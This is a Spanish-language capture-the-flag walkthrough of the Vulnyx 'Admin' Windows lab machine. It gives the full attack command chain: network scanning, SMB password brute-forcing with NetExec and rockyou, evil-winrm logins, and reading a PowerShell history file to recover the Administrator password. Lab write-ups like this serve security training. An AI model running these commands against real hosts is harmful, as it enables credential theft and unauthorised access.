Write-up: Máquina Admin (Vulnyx)
Comenzamos con averiguar la dirección IP de la Máquina Victima, para ello primeramente utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:
$ netdiscover -i eth1 -r 10.0.2.0/24
- Kali (Máquina Atacante): 10.0.2.4
- Máquina Victima: 10.0.2.70
Comprobamos si tenemos conexión con la Máquina Victima, para ello ejecutamos el siguiente comando:
$ ping -c 1 10.0.2.70
Como se puede comprobar por el TTL nos enfrentamos a una Máquina Windows.
A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando:
$ nmap -Pn -p- 10.0.2.70 -sVC
Como podemos comprobar la Máquina Victima tiene abiertos los puertos 80, 135, 139, 445, 5040, 5985, 7680, 47001, 49664, 49665, 49666, 49667, 49668, 49669 y 49670.
Comprobamos que es lo que corre por el puerto 80.
A continuación, realizamos con la herramienta gobuster un fuzzing web por extensiones, para ello ejecutamos el siguiente comando:
$ gobuster dir -u http://10.0.2.70 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x html,txt,php,js
Encontramos el usuario hope.
A continuación, con la ayuda de la herramienta NetExec (nxc) realizamos un ataque de fuerza bruta para intentar obtener la contraseña del usuario encontrado, para ello ejecutamos el siguiente comando:
$ nxc smb 10.0.2.70 -u 'hope' -p ./rockyou.txt --ignore-pw-decoding
Obtenemos las credenciales hope:loser.
Nos conectamos a la maquina victima a traves de WinRM (5985) con la ayuda de la herramienta evil-winrm, para ello ejecutamos el siguiente comando:
$ evil-winrm -i 10.0.2.70 -u 'hope' -p 'loser'
¡¡¡Somos hope!!!.
Buscamos en la ruta C:\Users\hope\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline donde está guardado el archivo del historial de la powershell ConsoleHost_history.txt, lo visualizamos, para ello ejecutamos el siguiente comando:
PS type C:\Users\hope\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Nos volvemos a conectar a la maquina victima a traves de WinRM (5985) con la ayuda de la herramienta evil-winrm, para ello ejecutamos el siguiente comando:
$ evil-winrm -i 10.0.2.70 -u 'Administrator' -p 'SuperAdministrator123'
¡¡¡Somos Administrator!!!.






